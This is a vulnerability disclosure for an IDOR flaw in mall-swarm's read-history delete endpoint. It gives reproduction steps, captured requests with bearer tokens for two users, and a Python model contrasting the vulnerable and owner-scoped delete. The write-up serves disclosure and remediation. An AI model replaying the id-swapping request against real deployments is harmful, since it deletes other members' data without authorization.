Description
Contributors: Huang Weigang
1. Vulnerability Impact
mall-swarm <=1.0.3 (latest)
https://github.com/macrozheng/mall-swarm
2. Vulnerability Location
POST /member/readHistory/delete HTTP/1.1
3. Code Analysis
First, the API takes the records to delete from the client-supplied ids parameter.

In the implementation that follows, the service deletes the read-history records matching those ids directly. Nothing ties the deletion to the currently logged-in member: the ids are never checked for ownership and the delete is never scoped to the caller's account, so any authenticated user can delete any other user's entries simply by naming their ids.
Vulnerability Reproduction
- Log in as User A.
- Capture the request made when User A deletes their read history.
- Modify the ids parameter in the request to include IDs belonging to User B.
- Send the modified request to the server.
- Observe that the read history entries for User B are deleted without authorization.
USER-A:
"type": "request",
"parameters": {
"method": "POST",
"url": "http://xxxx/member/readHistory/delete",
"headers": {
"authorization": "Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJ0ZXN0IiwiY3JlYXRlZCI6MTc2MTc1NjAyMDgzMiwiZXhwIjoxNzYyMzYwODIwfQ.b5ezoUwfw4NlBxpRDpZ_l6_42dZA0tuEj2_lpfxfPnY22wEgmUJHlrBjy--Zl4GMtOreR7ASe6PGdH4WhTrgkw",
"referer": "http://192.168.136.226:8060/",
"accept-language": "zh-CN,zh;q=0.9",
"user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
"content-type": "application/json;charset=UTF-8",
"Content-Type": "application/x-www-form-urlencoded"
},
"params": {
"ids": "1"
},
"json": {},
"data": {},
"files": {}
}
},
"Response parameters": {
"type": "response",
"parameters": {
"code": 200,
"message": "Operation successful",
"data": 1
}
},
USER-B:
"parameters": {
"method": "POST",
"url": "http://xxxx/member/readHistory/delete",
"headers": {
"authorization": "Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJtZW1iZXIiLCJjcmVhdGVkIjoxNzYxNzU1ODU0OTcwLCJleHAiOjE3NjIzNjA2NTR9.WMBhMO966qKtl2_28JNfrbOr3fa8kqbfFOILmw2M8XLuh-fZ5mgJHoY66H27H0PZdlf4MdQHN7tD-tGABXYLTQ",
"referer": "http://192.168.136.226:8060/",
"accept-language": "zh-CN,zh;q=0.9",
"user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
"content-type": "application/json;charset=UTF-8",
"Content-Type": "application/x-www-form-urlencoded"
},
"params": {
"ids": "1"
},
"json": {},
"data": {},
"files": {}
}
},
"Response parameters": {
"type": "response",
"parameters": {
"code": 200,
"message": "Operation successful",
"data": 1
}
},
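The following is an added example, not code from mall-swarm, that models the access-control defect described in the code analysis above and replays the two-user test from the reproduction steps. The in-memory store, the record fields (id, member_id, product_id), the member ids and the record ids are constructed stand-ins for the real read-history collection; the point is the difference between a delete keyed only on client-supplied ids and one that is also scoped by the member id taken from the authenticated session.

```python
"""Vulnerable vs. hardened deletion of read-history records (added example)."""
from dataclasses import dataclass


@dataclass
class ReadHistory:
    """Constructed stand-in for one read-history record."""
    id: str
    member_id: int
    product_id: int


class ReadHistoryStore:
    """In-memory stand-in for the read-history repository."""

    def __init__(self, rows):
        self.rows = {r.id: r for r in rows}

    def delete_by_ids(self, ids):
        """Vulnerable: deletes whatever ids the client names, owner ignored."""
        deleted = 0
        for rid in ids:
            if self.rows.pop(rid, None) is not None:
                deleted += 1
        return deleted

    def delete_by_ids_for_member(self, ids, member_id):
        """Hardened: the owner comes from the session, not the request, and is
        part of the delete predicate, so ids owned by someone else are no-ops."""
        deleted = 0
        for rid in ids:
            row = self.rows.get(rid)
            if row is not None and row.member_id == member_id:
                del self.rows[rid]
                deleted += 1
        return deleted


def handle_delete(store, current_member_id, ids_param, hardened):
    """Model of the /member/readHistory/delete handler.

    current_member_id stands for the identity resolved from the bearer token;
    ids_param is the raw form value (comma-separated ids, as in "1" or "b1,b2").
    """
    ids = [s.strip() for s in ids_param.split(",") if s.strip()]
    if hardened:
        count = store.delete_by_ids_for_member(ids, current_member_id)
    else:
        count = store.delete_by_ids(ids)
    # Same response shape as the captures above: code/message/data(count).
    return {"code": 200, "message": "Operation successful", "data": count}


def sample_store():
    """Constructed data: one record for User A (member 1), two for User B (member 2)."""
    return ReadHistoryStore([
        ReadHistory("a1", member_id=1, product_id=26),
        ReadHistory("b1", member_id=2, product_id=27),
        ReadHistory("b2", member_id=2, product_id=28),
    ])


def reproduce(hardened):
    """Replay the issue: User A (member 1) sends a delete naming User B's ids.

    Returns (deleted count reported to A, User B's ids still in the store).
    """
    store = sample_store()
    resp = handle_delete(store, current_member_id=1, ids_param="b1,b2",
                         hardened=hardened)
    remaining_b = [r.id for r in store.rows.values() if r.member_id == 2]
    return resp["data"], remaining_b


if __name__ == "__main__":
    print("vulnerable:", reproduce(hardened=False))  # B's records are gone
    print("hardened:  ", reproduce(hardened=True))   # B's records survive
```

Scoping the delete by the session's member id, rather than checking ownership first and then deleting by id, closes the window between the check and the delete and also means a foreign id behaves exactly like a nonexistent one (zero rows affected), so the response count reveals nothing about other members' records.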
4. Impact Description
This vulnerability allows any authenticated member to delete the read history of other users by placing the victim's record IDs in the ids parameter; the attacker needs only valid IDs, since the server trusts the client-supplied list and never scopes the deletion to the caller's own account. The result is unauthorized deletion of other users' data, a broken object-level authorization (IDOR) flaw in the endpoint's access control.